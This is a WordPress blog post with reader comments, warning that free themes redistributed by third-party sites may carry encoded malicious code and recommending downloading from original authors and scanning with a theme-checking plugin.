Downloading Themes from 3rd Party sites? Be careful..!
Being a WordPress user we enjoy the advantage of free themes, Right? Yes Obviously. But, some bad dogs out there, using the same advantage to takeover your blogs. Usually we search and download themes from third party sites. But experts say it’s not safe, as there may be a chance of getting some malicious code along with the theme.
Derek, author at 5thirtyone explains his own experience. Derek develops and shares the WordPress themes for free. But one fine day he received a mail from one of his theme user saying..
Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:
I have one question about the encoded stuff I saw in the header, [...]
After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php File. Paul Carroll took the time to break down what the code above exposes users to.
I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.
The same thing applies to free download plugins too…It’s always better to trace the author of that theme or plugin and download directly from there. If you download from some 3rd party site and something goes wrong, you can’t ask/blame anybody there.
Already Downloaded? What to Do now??
Don’t worry, still we have some ways to scan them now. We have a plugin called Theme Authenticity Checker, which will scan your entire theme directory to find the possible malicious code. Download and scan your theme right now.
We also have sites like http://novirusthanks.org which can find any malicious or iframe codes in your WordPress directory.
Day by day growth in blogosphere causing many problems along with the advantages we enjoy. So it’s always our responsibility to be active and cautious. Scan your themes and plugins right now and contact the original author for any support.
Hope you found it useful. Found any suspicious code in your theme or plugin? Share with us! Happy Blogging!!
Related posts:
Free themes are risky and also, in many cases, they Do not suit the exact demands of the user. I guess if you have the money, custom designed theme is the way to go.
Yes obviously its better to for custom design. But money matters
More than 50% users using free themes. SO hackers got the chance to manipulate them.
Well Lax! I am using TAC plugin and it is working well. Sometimes what’s going on is that free themes are edited with some encoded/maligned stuffs and then it is uploaded in many free themes directory.
1st download it in the theme author’s official webpage than anything else.
I have seen plenty of free theme directories who have added footer links and maligned stuffs in a good theme.
Yes many of them added their link in footer. As you said its always better to download from author. Thanks for the comments dude..
[...] for backing up, but I’ve also read suggestions that you should Downloading Themes from 3rd Party sites? Be careful..! – techzoomin.com 06/28/2009 Being a [...]
Thanks for bringing a live example to notice! It will surely help WordPress blog owners to stay alert and scan their theme before applying.
That’s great you found it useful dude. Thanks..
Free themes are downloaded many times a day and there is always a risk. I would say that you must download from a reliable source, one that you can trust.
After you have downloaded, go through the code to see if it’s ok. You would be able to see straight away if it has malicious code or not. The plugin is also great.
This has happened to many people who just download and upload.
If you know little php and html, then its always better to spend some time to monitor the code. If not use that plugin..
Thanks for sharing your thoughts George.
You should always check the themes by yourself. It is not a difficult task. Learn a little about HTML and you can recognize those non-sense codes.
Yes that’s true. If you download from the original author,then you don’t need to worry. All these middle dogs paying the tricks.
I am testing one WordPress template and it has a Relay.php File which contains such code. I am pasting the initial part and the end part of this code here. Just tell me weather it is malicious code or no!
Is it a malicious code? Please reply! I need help!
Where is the code? Relay.php is something i never heard in WP themes.
Do check/scan thoroughly with the TAC plugin provided above.
The code is not getting pasted in your comments section. Might be it is regarded as Spam! I will try again..
It is not getting published here…I don’t know why!
Have a look at the source of Relay.php..And please reply asap. http://livecricketscore.co.cc/relay.txt
After installing the TAC plugin I found that his is some encrypted code! Now should I delete this relay.php File? Will it affect my WordPress theme?
This is something like exactly which i showed in the post(Image).
Started with Eval, Eval is a call for procedure execution which manipulates your database. I’m not sure, but according my knowledge its possibly a database manipulation code.
Download the same theme from the original author and check whether the relay.php is there or not.
Or i strongly recommend to stop using that theme and deactivate it ASAP.
I finally figured out what that RELAY.PHP files does. Stay updated with my Blog and I am going to write about it soon!
Great post.
Thanks for the heads up. from now i will be extra careful.
Hey Nihar,
Thanks for your comments…that should be done from all of us. Then we can restrict the hackers
[...] See more here: Downloading Themes from 3rd Party sites? Be careful..! [...]
I never thought of this, but you’re completely right. People could alter the theme and put malicious software in it. I’ll be careful from now on.
Great that you found it useful. Thanks dude..
Useful post. Never really thought about that. Am gonna Do a scan right now then
Do that quickly then
This is really nice information, i will straight away check for the theme for any such issues.
Thanks for sharing it.
To play safe, download only from popular theme sharing site.